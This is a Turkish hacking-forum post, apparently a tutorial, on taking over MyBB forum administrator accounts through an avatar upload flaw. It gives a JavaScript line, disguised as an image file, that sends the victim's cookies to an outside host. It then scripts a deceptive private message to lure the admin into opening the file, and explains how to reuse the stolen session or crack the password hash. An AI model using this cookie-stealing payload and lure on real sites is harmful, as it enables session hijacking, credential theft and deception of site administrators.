![]() |
|
|||||||
| Kayıt ol | Yardım | Üye Listesi | Ajanda | Forumları Okundu Kabul Et |
| Tags: admin, avatar, giris, ile, metodu, sifresine |
![]() |
|
|
LinkBack | Seçenekler | Stil |
|
||||
|
Evet Şimdi MyBB forumlardaki uplout açığı sayesinde forumdaki yöneticilerin şifrelerini çalmayı anlatacağım
>İlk başta bir not defteri açıyoruz ve aşağıdaki verdiğim kodları içine yazıyoruz farklı kaydet diyip ’’.jpg veyada .gif’’ şeklinde yani resim formatında kaydedeceğiz. kod : **********img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;*********** Daha sonra siteye üye olup avatar bölümünden göz at diyip resmimizi göz at diyip yüklüyoruz. Resmimiz forumlarda gözükmeyecektir.Sağ Tıklayıp Özelliklerden Resmin URL sini yani adresini seçip kopyalıyoruz. Sonra admine özel mesaj gönderiyoruz ve şu tarz bir bilgi yazıyoruz: ’’ Ya kardeş benim Her Tarafta kullandığım çok sevdiğim bir avatarım var ama senin sitende görükmüyor sorun nedir acaba avatarın linkini verdim aşağıda diyoruz. ve avatarın linkini koyuyoruz.’’ admin linke tıkladığı zaman admin cookie, hash, userid falan hepsi buraya geliyor USPAN style=font-SIZE: 10pt; COLOR: #006699"> face=Arial [Linkleri sadece üyelerimiz görebilir. Üye olmak için tıklayın...] Bilgiler geldikten sonra SPAN style=font-SIZE: 8.5pt"> face=Times New Roman [Linkleri sadece üyelerimiz görebilir. Üye olmak için tıklayın...] giderek cookie editörü indiriyoruz. ve kendi bilgilerimizi değiştirip adamın bilgilerini giriyoruz kaydediyoruz tekrar siteye giriyoruz ve admin girişi yapıyoruz. Yada admin hash’ı ile USPAN style=font-SIZE: 10pt; COLOR: #006699"> face=Times New Roman [Linkleri sadece üyelerimiz görebilir. Üye olmak için tıklayın...] ’dan kırdıktan sonra adamın nick’i ve şifresi ile online oluyoruz.. olay bu kadar basit .. Emeğe saygı!
| Stil | |
|
|